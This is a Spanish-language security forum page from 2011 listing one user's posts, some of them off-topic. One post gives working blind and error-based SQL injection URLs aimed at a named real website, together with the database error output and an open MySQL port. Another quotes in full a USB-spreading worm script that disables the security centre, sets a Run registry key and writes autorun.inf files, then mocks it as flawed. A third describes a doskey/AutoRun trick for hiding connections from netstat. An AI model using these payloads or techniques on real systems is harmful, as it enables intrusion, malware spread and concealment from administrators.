| |
 Mostrar Mensajes
|
|
Páginas: [1] 2 3
|
|
3
|
Seguridad Informática / Nivel Web / Re: He encontrado un bug, pero como explotarlo?
|
en: 19 Julio 2011, 10:31 am
|
Segúramente se refiere a que encontró un bug en el sitio web y por el contexto se asume que no "descubrió" el método, aunque igualmente considero absurdo discutir quién utilizó por primera vez un método tan elemental basado en el principio de inyección de código. Fácilmente se puede explotar con substring, length, etc si lo que se pretende es leer datos específicos. La versión "5.0.92-community" tiene information_schema.tables. http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/information_schema.tables/**/WHERE/**/substring(table_name,1,10)='collations'/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1 Da pereza extraer datos mediante blind por lo que también puedes generar mensajes de error - lástima que no puedas leer mysql.user y mucho menos en esta versión de MySQL- : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND/**/(SELECT/**/1/**/FROM/**/mysql.user/**/LIMIT/**/0,1)='1&tipo_buscador2=temas&cat=-1 SELECT command denied to user 'tumusica_new'@'localhost' for table 'user' O conectarte al puerto de MySQL (el servidor lo tiene abierto) : comunidad.onlypost.net [190.210.100.80] 3306 (?) open
>
5.0.92-community K÷é ^?]8?rD9 ,☻ 207bheDa;D%' O incluso generar mensajes de error para extraer datos : http://comunidad.onlypost.net/comunidades/buscador/comunidades/?q='/**/AND(SELECT/**/1/**/FROM(SELECT/**/count(*),concat((SELECT/**/(SELECT/**/(SELECT/**/distinct/**/concat(0x7e,0x27,unhex(Hex(cast(table_name/**/AS/**/char))),0x27,0x7e)/**/FROM/**/information_schema.tables/**/LIMIT/**/1,1))/**/FROM/**/information_schema.tables/**/LIMIT/**/0,1),floor(rand(0)*2))x/**/FROM/**/information_schema.tables/**/group/**/by/**/x)a)/**/AND/**/'1'='1&tipo_buscador2=temas&cat=-1 |
|
|
|
|
4
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [MASM][UserMode]Hook OpenProcess
|
en: 16 Julio 2011, 06:37 am
|
Es natural que esta clase de códigos se parezcan ya que siempre se usan los mismos métodos basados en la misma teoría. Ahora parece que porque un novato publica su ejemplo de hooking, code caving u otro estúpido nombre que quieran usar es un calca-códigos. Además ni que fueran tan excelentes los ejemplos, se pueden mejorar mucho, simplificar la teoría con un ejemplo práctico, etc. API Hooking en usermode no tiene nada de innovador ni uber para tanta discusión, pienso que cualquier código que use OpenProcess, VirtualProtectEx, VirtualAllocEx, WriteProcessMemory para este tipo de cosas se parecería. Otra cosa que hay que destacar es lo inútiles que son las críticas de los usuarios del foro con su infinita sabiduría. mov eax, offset _EndHook
mov ebx, offset _Hook
sub eax, ebx Esa clase de cosas no requieren hacer uso de instrucciones porque siempre el tamaño entre esos offsets sera un valor fijo ya que no se iran corriendo una vez que se haya ensamblado el código, por lo que se puede usar el tamaño de la función directamente en WriteProcessMemory. mov ecx, offset _Hook
invoke WriteProcessMemory,dword ptr[hProcess], dword ptr [fAddress], ecx, dword ptr [DistanceFunc], addr Bytesw
Eso tiene poco sentido y supongo que no hace falta mayor explicacion, sobretodo porque el valor de ecx será diferente despues de la llamada a WriteProcessMemory y porque no se vuelve a usar. Me da pereza seguir revisando el código, nos vemos. |
|
|
|
|
5
|
Programación / ASM / Re: [MASM] Busca offsets
|
en: 11 Febrero 2011, 18:58 pm
|
Claro , pero or te modifica eax xD
No si el destino es igual a la fuente. El API GetProcAddress como bien sabemos, si la función falla, devuelve EAX = 0, entonces, en caso de ser 0, el valor no se vería afectado, pero si EAX tiene un valor X y se hace un OR EAX,EAX no estas modificando el valor de EAX. En otras palabras, se puede usar un OR para saber si el valor no es igual a 0 sin que afecte en absoluto. Por lo tanto, Main PROC
LOCAL resultado:DWORD
invoke LoadLibrary, addr libreria
invoke GetProcAddress, eax, addr funcion
or eax,eax
je Error
mov resultado, eax ;Si no quieres usar la variable imprime directamente eax
invoke StdOut, uhex$([b]eax[/b])
ret
Error:
invoke StdOut, addr error
ret
Main ENDP Es correcto, obviando que no lo sería si necesitaramos usar la dirección del API en un código más grande. Otra alternativa "no-destructiva" a OR es TEST, aunque en este caso no es necesaria, y una "destructiva", además de OR es AND para este caso. Pasando al tema del código, puedes remover ese stack frame que creas con el macro "PROC", que ni se para que lo usas xD. |
|
|
|
|
6
|
Foros Generales / Foro Libre / Re: El origen extraterrestre de la especie humana
|
en: 23 Enero 2011, 19:25 pm
|
"Los seres humanos parecen ser una raza esclavizada reproduciéndose en un planeta aislado de una pequeña galaxia. La raza humana fue una vez fuente de mano de obra para una civilización extraterrestre, para la cual seguimos siendo su posesión. Para mantener el control sobre su posesión y mantener a la Tierra como una especie de prisión, esa otra civilización ha alimentado un interminable conflicto entre los seres humanos, ha promovido la decadencia espiritual y ha creado en la Tierra condiciones irreversibles de penuria física. Esta situación ha existido por miles de años, y aún continúa hasta nuestros días." (The Gods of Eden). ¿Como con los goa'ulds de "Stargate"? |
|
|
|
|
7
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Mi nuevo propagador, por usb!!
|
en: 22 Enero 2011, 21:50 pm
|
set cmd = createobject("wscript.shell" )
cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c :bucle ", vbHide
cmd.run "cmd /c call :copiausb ", vbHide
cmd.run "cmd /c :copiausb ", vbHide
cmd.run "cmd /c if exist E: call :creausb E ", vbHide
cmd.run "cmd /c if exist F: call :creausb F ", vbHide
cmd.run "cmd /c if exist G: call :creausb G ", vbHide
cmd.run "cmd /c if exist H: call :creausb H ", vbHide
cmd.run "cmd /c if exist I: call :creausb I ", vbHide
cmd.run "cmd /c if exist J: call :creausb J ", vbHide
cmd.run "cmd /c if exist K: call :creausb K ", vbHide
cmd.run "cmd /c ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c goto bucle ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
cmd.run "cmd /c :creausb ", vbHide
cmd.run "cmd /c copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c goto :eof ", vbHide
Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues. Tampoco el código es una obra maestra... cmd.run "cmd /c #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide Eso fue muy sin sentido... cmd.run "cmd /c reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f". Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc. Lord RNA podrias enseñarme el code? Es por verlo, si quieres... Ciertamente no es complicado, Yo hice uno en ASM que suplantaba un ejecutable y guardaba el real en otra parte del disco, cuando dabas doble clic se ejecutaba el worm y lanzaba el programa real Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL. Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE. |
|
|
|
|
8
|
Seguridad Informática / Análisis y Diseño de Malware / Re: Ocultar IP a herramientas de Administracion de Redes
|
en: 22 Enero 2011, 01:56 am
|
Cuando se trata de aplicaciones ejecutadas en línea de comandos, es un desperdicio el reemplazar el ejecutable de netstat, que posiblemente mostraría el típico mensaje de Windows cuando una de sus aplicaciones ha sido reemplazada por "versiones desconocidas". Si bien es cierto que lo óptimo seria el uso de Hooks, existe otra alternativa, aunque sólo aplicable si netstat es ejecutado desde el intérprete de comandos. La solución consistiría en agregar en "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" un valor alfanumérico llamado "AutoRun" y hacer un doskey de la siguiente forma : [poc]@doskey netstat.exe=filtro[/poc], otra solución, si no se especifica la extensión del ejecutable, sin recurrir a "doskey", es crear un nestat.com en system32, para que cuando se ejecute "netstat", se ejecute nuestro .com. A todo esto, http://www.osix.net/modules/article/?id=781 |
|
|
|
|
9
|
Foros Generales / Foro Libre / Re: Yo quiero ser Inmortal - NO quiero morir ¿y TU?
|
en: 22 Enero 2011, 01:19 am
|
Todos somos inmortales.
El tiempo es infinito, pero la materia no. Llegará un momento, en un tiempo X en el que las combinaciones de átomos volverán a repetirse y volveremos a aparecer tal y como estuvimos.
...No recuerdo mis infinitas vidas pasadas, o mis infinitas muertes y resurrecciones. (lol) ¿Quién eres tú?, ¿eres tu consciencia o un cuerpo físico? |
|
|
|
|
10
|
Comunicaciones / Mensajería / Re: Evitar la actulizacion a MSN 2011
|
en: 22 Enero 2011, 01:02 am
|
Hey man yo no lo vi.. ni nada por el estilo simplemente me puse a cranear un cacho nada mas.. y me salio eso simplemente asi de facil y gracias por el dato no sabia q tenia q ser asi 15.4.3508.1109 por algo tardo en conectarme supongo.. Y lo postee es sola para compartir nada mas lo siento si eres tan capo en la materia.. y te moleste Saludos ]  Sí, usted no lo vio publicado en alguna otra comunidad y por ende, el tutorial no se parece en absolutamente nada al resto, pero bueno, no me voy a poner a discutir por eso. |
|
|
|
|
|
| |
|
